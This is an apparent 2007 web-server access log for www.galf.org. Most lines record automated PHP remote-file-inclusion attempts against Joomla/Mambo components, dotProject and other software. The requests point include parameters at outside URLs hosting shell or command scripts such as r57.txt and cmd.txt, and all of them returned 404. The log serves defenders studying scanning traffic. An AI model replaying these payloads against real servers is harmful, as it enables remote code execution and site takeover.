201.36.249.209 - - [02/Sep/2007:20:10:40 -0700] "GET /logs/2http://coyoote.iespana.es/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
201.36.249.209 - - [02/Sep/2007:20:10:42 -0700] "GET /2http://coyoote.iespana.es/cmd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.galf.org"
89.149.208.30 - - [02/Sep/2007:20:14:43 -0700] "GET /logs//dotproject/includes/db_adodb.php?baseDir=http://usuarios.arnet.com.ar/larry123/check.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
89.149.208.30 - - [02/Sep/2007:20:14:43 -0700] "GET //dotproject/includes/db_adodb.php?baseDir=http://usuarios.arnet.com.ar/larry123/check.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.249.79.70 - - [02/Sep/2007:20:25:50 -0700] "GET /logs/index2.php?x=http://www.therealflow.net/foro/style_images/cvv.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.249.79.70 - - [02/Sep/2007:20:25:50 -0700] "GET /index2.php?x=http://www.therealflow.net/foro/style_images/cvv.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
202.4.162.162 - - [02/Sep/2007:20:42:01 -0700] "GET /logs/access_070827.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://hl47.dinaserver.com/hosting/ux0.eu/ux0/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
202.4.162.162 - - [02/Sep/2007:20:42:02 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://hl47.dinaserver.com/hosting/ux0.eu/ux0/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
202.4.162.162 - - [02/Sep/2007:20:42:03 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://hl47.dinaserver.com/hosting/ux0.eu/ux0/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
212.241.213.165 - - [02/Sep/2007:20:42:56 -0700] "GET /logs/index.php?pag=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [02/Sep/2007:20:42:56 -0700] "GET /index.php?pag=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.168.26 - - [02/Sep/2007:20:53:11 -0700] "GET /logs/index2.php?x=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
81.169.168.26 - - [02/Sep/2007:20:53:12 -0700] "GET /index2.php?x=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
81.169.168.26 - - [02/Sep/2007:20:53:25 -0700] "GET /logs/index.php?include=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
81.169.168.26 - - [02/Sep/2007:20:53:26 -0700] "GET /index.php?include=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
86.109.165.60 - - [02/Sep/2007:20:54:01 -0700] "GET /logs/index.php?include=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
86.109.165.60 - - [02/Sep/2007:20:54:02 -0700] "GET /index.php?include=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
86.109.165.60 - - [02/Sep/2007:20:54:05 -0700] "GET /logs/index.php?include=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
86.109.165.60 - - [02/Sep/2007:20:54:06 -0700] "GET /index.php?include=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
202.4.162.162 - - [02/Sep/2007:20:56:38 -0700] "GET /logs/access_070827.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://hl47.dinaserver.com/hosting/ux0.eu/ux0/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
202.4.162.162 - - [02/Sep/2007:20:56:39 -0700] "GET /components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://hl47.dinaserver.com/hosting/ux0.eu/ux0/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
202.4.162.162 - - [02/Sep/2007:20:56:41 -0700] "GET /logs/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://hl47.dinaserver.com/hosting/ux0.eu/ux0/cmd.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.63" "www.galf.org"
72.52.205.32 - - [02/Sep/2007:21:10:55 -0700] "GET /logs/index.php?pag=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.52.205.32 - - [02/Sep/2007:21:10:55 -0700] "GET /index.php?pag=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
195.113.83.59 - - [02/Sep/2007:21:11:27 -0700] "GET /logs/access.log//modules/My_eGallery/index.php?basepath=http://www.geocities.com/adi_gaul2007/mumun.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.113.83.59 - - [02/Sep/2007:21:11:27 -0700] "GET //modules/My_eGallery/index.php?basepath=http://www.geocities.com/adi_gaul2007/mumun.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.113.83.59 - - [02/Sep/2007:21:11:27 -0700] "GET /logs//modules/My_eGallery/index.php?basepath=http://www.geocities.com/adi_gaul2007/mumun.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.113.83.59 - - [02/Sep/2007:21:12:23 -0700] "GET /logs/access_070618.log//modules/My_eGallery/index.php?basepath=http://www.geocities.com/adi_gaul2007/mumun.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
212.241.213.165 - - [02/Sep/2007:21:15:08 -0700] "GET /logs/index2.php?x=http://www.aniversaris.info/images/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803"
212.241.213.165 - - [02/Sep/2007:21:15:09 -0700] "GET /index2.php?x=http://www.aniversaris.info/images/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [02/Sep/2007:21:15:11 -0700] "GET /logs/index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [02/Sep/2007:21:15:11 -0700] "GET /index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [02/Sep/2007:21:15:16 -0700] "GET /logs/index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [02/Sep/2007:21:15:17 -0700] "GET /index2.php?x=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
200.106.87.225 - - [02/Sep/2007:21:15:21 -0700] "GET / HTTP/1.1" 200 1048 "http://www.mhol.org.pe/comglbt.htm" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)" "www.galf.org"
200.106.87.225 - - [02/Sep/2007:21:15:21 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)" "www.galf.org"
193.34.133.79 - - [02/Sep/2007:21:15:22 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://pipposukkione.ifrance.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
193.34.133.79 - - [02/Sep/2007:21:15:23 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.ilsupernet.it/htaccess.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
193.34.133.79 - - [02/Sep/2007:21:15:23 -0700] "GET /modules/My_eGallery/index.php?basepath=http://pipposukkione.ifrance.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
193.34.133.79 - - [02/Sep/2007:21:15:24 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.ilsupernet.it/htaccess.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
200.106.87.225 - - [02/Sep/2007:21:15:36 -0700] "GET / HTTP/1.1" 200 1048 "http://www.mhol.org.pe/comglbt.htm" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.1)" "www.galf.org"
212.241.213.165 - - [02/Sep/2007:21:21:18 -0700] "GET /logs/index2.php?content=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [02/Sep/2007:21:21:19 -0700] "GET /index2.php?content=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.168.228.204 - - [02/Sep/2007:21:24:09 -0700] "GET /index.php?x=http://212.241.197.108/remot.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
201.14.0.237 - - [02/Sep/2007:21:26:32 -0700] "GET /logs/index.php?include=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
201.14.0.237 - - [02/Sep/2007:21:26:33 -0700] "GET /index.php?include=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
201.14.0.237 - - [02/Sep/2007:21:26:54 -0700] "GET /logs/index2.php?content=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
195.113.83.59 - - [02/Sep/2007:21:26:59 -0700] "GET /logs/access.log//modules/My_eGallery/index.php?basepath=http://www.geocities.com/adi_gaul2007/mumun.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.113.83.59 - - [02/Sep/2007:21:26:59 -0700] "GET //modules/My_eGallery/index.php?basepath=http://www.geocities.com/adi_gaul2007/mumun.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.113.83.59 - - [02/Sep/2007:21:26:59 -0700] "GET /logs//modules/My_eGallery/index.php?basepath=http://www.geocities.com/adi_gaul2007/mumun.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.113.83.59 - - [02/Sep/2007:21:27:11 -0700] "GET /logs/access.log//modules/My_eGallery/index.php?basepath=http://www.geocities.com/adi_gaul2007/mumun.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.113.83.59 - - [02/Sep/2007:21:27:12 -0700] "GET //modules/My_eGallery/index.php?basepath=http://www.geocities.com/adi_gaul2007/mumun.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
195.113.83.59 - - [02/Sep/2007:21:27:12 -0700] "GET /logs//modules/My_eGallery/index.php?basepath=http://www.geocities.com/adi_gaul2007/mumun.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
190.40.250.133 - - [02/Sep/2007:21:27:31 -0700] "GET / HTTP/1.1" 200 1048 "http://espanol.iwhc.org/enlaces.cfm" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
195.113.83.59 - - [02/Sep/2007:21:27:45 -0700] "GET /logs/access_070618.log//modules/My_eGallery/index.php?basepath=http://www.geocities.com/adi_gaul2007/mumun.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
190.40.250.133 - - [02/Sep/2007:21:27:50 -0700] "GET /cendoc/ HTTP/1.1" 200 526 "http://www.galf.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
190.40.250.133 - - [02/Sep/2007:21:27:52 -0700] "GET / HTTP/1.1" 200 1048 "http://www.galf.org/cendoc/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
190.40.250.133 - - [02/Sep/2007:21:27:56 -0700] "GET /logs/ HTTP/1.1" 200 5085 "http://www.galf.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
195.113.83.59 - - [02/Sep/2007:21:27:56 -0700] "GET /logs/access_070618.log//modules/My_eGallery/index.php?basepath=http://www.geocities.com/adi_gaul2007/mumun.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
190.40.250.133 - - [02/Sep/2007:21:28:01 -0700] "GET /logs/access_070219.log HTTP/1.1" 200 307222 "http://www.galf.org/logs/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
190.40.250.133 - - [02/Sep/2007:21:28:10 -0700] "GET / HTTP/1.1" 200 1048 "http://www.galf.org/cendoc/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
190.40.250.133 - - [02/Sep/2007:21:28:13 -0700] "GET /cendoc/ HTTP/1.1" 200 526 "http://www.galf.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
190.40.250.133 - - [02/Sep/2007:21:28:17 -0700] "GET /logs/ HTTP/1.1" 200 5085 "http://www.galf.org/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
190.40.250.133 - - [02/Sep/2007:21:28:25 -0700] "GET / HTTP/1.1" 200 1048 "http://www.galf.org/cendoc/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.galf.org"
74.6.19.78 - - [02/Sep/2007:21:43:07 -0700] "GET /robots.txt HTTP/1.0" 404 275 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)"
74.6.26.203 - - [02/Sep/2007:21:43:08 -0700] "GET /?S=D HTTP/1.0" 200 1032 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.galf.org"
201.14.0.237 - - [02/Sep/2007:21:45:24 -0700] "GET /index.php?pag=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
65.99.221.16 - - [02/Sep/2007:21:48:29 -0700] "GET /logs/index.php?http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
65.99.221.16 - - [02/Sep/2007:21:48:29 -0700] "GET /index.php?http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
212.227.60.6 - - [02/Sep/2007:21:49:26 -0700] "GET /logs/index.php?http://www.thebarnraisers.com/xpl/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.227.60.6 - - [02/Sep/2007:21:49:27 -0700] "GET /index.php?http://www.thebarnraisers.com/xpl/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
64.20.40.147 - - [02/Sep/2007:22:01:09 -0700] "GET /logs/index.php?pag=http://www.aniversaris.info/images/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.20.40.147 - - [02/Sep/2007:22:01:18 -0700] "GET /index.php?pag=http://www.aniversaris.info/images/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
212.241.213.165 - - [02/Sep/2007:22:17:22 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.213.165 - - [02/Sep/2007:22:17:22 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
212.241.212.167 - - [02/Sep/2007:22:22:04 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://xpl.shidex.or.id/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
81.169.168.26 - - [02/Sep/2007:22:22:04 -0700] "GET /logs/index.php?go=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
81.169.168.26 - - [02/Sep/2007:22:22:05 -0700] "GET /index.php?go=http://www.dunakom.hu/userimages/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.galf.org"
212.241.212.167 - - [02/Sep/2007:22:22:05 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://xpl.shidex.or.id/r57.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
64.191.6.72 - - [02/Sep/2007:22:22:07 -0700] "GET /logs//dotproject/includes/db_adodb.php?baseDir=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
64.191.6.72 - - [02/Sep/2007:22:22:07 -0700] "GET //dotproject/includes/db_adodb.php?baseDir=http://www.the-esao.com/imag/stringa.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
81.89.81.231 - - [02/Sep/2007:22:23:39 -0700] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
125.32.113.242 - - [02/Sep/2007:22:27:42 -0700] "GET /logs/index.php?http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79"
125.32.113.242 - - [02/Sep/2007:22:27:43 -0700] "GET /index.php?http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
86.109.165.60 - - [02/Sep/2007:22:29:14 -0700] "GET /logs//dotproject/includes/db_adodb.php?baseDir=http://www.the-esao.com/imag/stringa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
86.109.165.60 - - [02/Sep/2007:22:29:15 -0700] "GET //dotproject/includes/db_adodb.php?baseDir=http://www.the-esao.com/imag/stringa.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
64.20.40.147 - - [02/Sep/2007:22:29:57 -0700] "GET /logs/index2.php?x=http://www.aniversaris.info/images/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.20.40.147 - - [02/Sep/2007:22:30:05 -0700] "GET /index2.php?x=http://www.aniversaris.info/images/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.20.40.147 - - [02/Sep/2007:22:35:20 -0700] "GET /logs/index2.php?content=http://www.aniversaris.info/images/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.20.40.147 - - [02/Sep/2007:22:35:28 -0700] "GET /index2.php?content=http://www.aniversaris.info/images/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.149.196.204 - - [02/Sep/2007:22:36:53 -0700] "GET /logs/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://img53.imageshack.us/img53/917/osruntb5.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
72.52.205.32 - - [02/Sep/2007:22:39:34 -0700] "GET /logs//shared_functions.php?_SESSION[docroot_path]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.52.205.32 - - [02/Sep/2007:22:39:35 -0700] "GET //shared_functions.php?_SESSION[docroot_path]=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
62.149.196.204 - - [02/Sep/2007:22:40:14 -0700] "GET /logs/access_070716.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://img53.imageshack.us/img53/917/osruntb5.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.20.40.147 - - [02/Sep/2007:22:42:48 -0700] "GET /logs/index.php?include=http://www.aniversaris.info/images/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65"
64.20.40.147 - - [02/Sep/2007:22:42:56 -0700] "GET /index.php?include=http://www.aniversaris.info/images/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
87.81.160.170 - - [02/Sep/2007:22:43:01 -0700] "GET /logs/access_070528.log//index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://chronosx.free.fr/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.81.160.170 - - [02/Sep/2007:22:43:02 -0700] "GET //index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://chronosx.free.fr/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
87.81.160.170 - - [02/Sep/2007:22:43:02 -0700] "GET /logs//index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://chronosx.free.fr/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.232.235.59 - - [02/Sep/2007:22:45:21 -0700] "GET /logs//modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
72.232.235.59 - - [02/Sep/2007:22:45:21 -0700] "GET //modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808"
18.149.0.122 - - [02/Sep/2007:22:55:10 -0700] "GET /logs/access_070528.log//index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://chronosx.free.fr/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
18.149.0.122 - - [02/Sep/2007:22:55:10 -0700] "GET //index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://chronosx.free.fr/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
18.149.0.122 - - [02/Sep/2007:22:55:10 -0700] "GET /logs//index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://chronosx.free.fr/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
72.232.235.59 - - [02/Sep/2007:22:55:39 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.232.235.59 - - [02/Sep/2007:22:55:39 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.232.235.59 - - [02/Sep/2007:22:56:09 -0700] "GET /logs/administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
72.232.235.59 - - [02/Sep/2007:22:56:09 -0700] "GET /administrator/components/com_cropimage/admin.cropcanvas.php?cropimagedir=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.galf.org"
217.22.61.3 - - [02/Sep/2007:23:01:24 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://h1.ripway.com/sk0l/spread.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
217.22.61.3 - - [02/Sep/2007:23:01:25 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://h1.ripway.com/sk0l/spread.jpg? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
80.79.137.92 - - [02/Sep/2007:23:05:45 -0700] "GET /logs/index.php?go=http://humszolg.hu/html/g.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
80.79.137.92 - - [02/Sep/2007:23:05:45 -0700] "GET /index.php?go=http://humszolg.hu/html/g.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
80.79.137.92 - - [02/Sep/2007:23:05:46 -0700] "GET /logs/index.php?go=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
80.79.137.92 - - [02/Sep/2007:23:05:46 -0700] "GET /index.php?go=http://usuarios.arnet.com.ar/larry123/safe.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
62.149.196.204 - - [02/Sep/2007:23:07:59 -0700] "GET /components/com_artlinks/artlinks.dispnew.php?mosConfig_absolute_path=http://img53.imageshack.us/img53/917/osruntb5.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
213.161.128.35 - - [02/Sep/2007:23:15:25 -0700] "GET /logs/access_070528.log//index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://chronosx.free.fr/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.161.128.35 - - [02/Sep/2007:23:15:25 -0700] "GET //index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://chronosx.free.fr/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
213.161.128.35 - - [02/Sep/2007:23:15:26 -0700] "GET /logs//index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://chronosx.free.fr/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.galf.org"
75.15.124.189 - - [02/Sep/2007:23:17:52 -0700] "GET /logs/access_070528.log//index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://chronosx.free.fr/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
75.15.124.189 - - [02/Sep/2007:23:17:53 -0700] "GET //index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://chronosx.free.fr/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.galf.org"
75.15.124.189 - - [02/Sep/2007:23:17:53 -0700] "GET /logs//index2.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://chronosx.free.fr/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805"
64.20.40.147 - - [02/Sep/2007:23:28:42 -0700] "GET /logs//components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.aniversaris.info/images/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
64.20.40.147 - - [02/Sep/2007:23:28:50 -0700] "GET //components/com_zoom/includes/database.php?mosConfig_absolute_path=http://www.aniversaris.info/images/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.galf.org"
62.149.196.204 - - [02/Sep/2007:23:34:02 -0700] "GET /logs/access_070604.log/administrator/components/com_linkdirectory/toolbar.linkdirectory.html.php?mosConfig_absolute_path=http://img53.imageshack.us/img53/917/osruntb5.gif? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.galf.org"
64.201.76.117 - - [02/Sep/2007:23:39:41 -0700] "GET /logs/access_070723.log HTTP/1.1" 200 4087522 "http://www.google.com/search?hl=en&q=http%3A%5C%5Cwww.delano-e.com%5Cshells%5Cc99.txt&btnG=Google+Search" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.6) Gecko/20070725 Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.galf.org"
64.201.76.117 - - [02/Sep/2007:23:39:42 -0700] "GET /favicon.ico HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.6) Gecko/20070725 Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)" "www.galf.org"
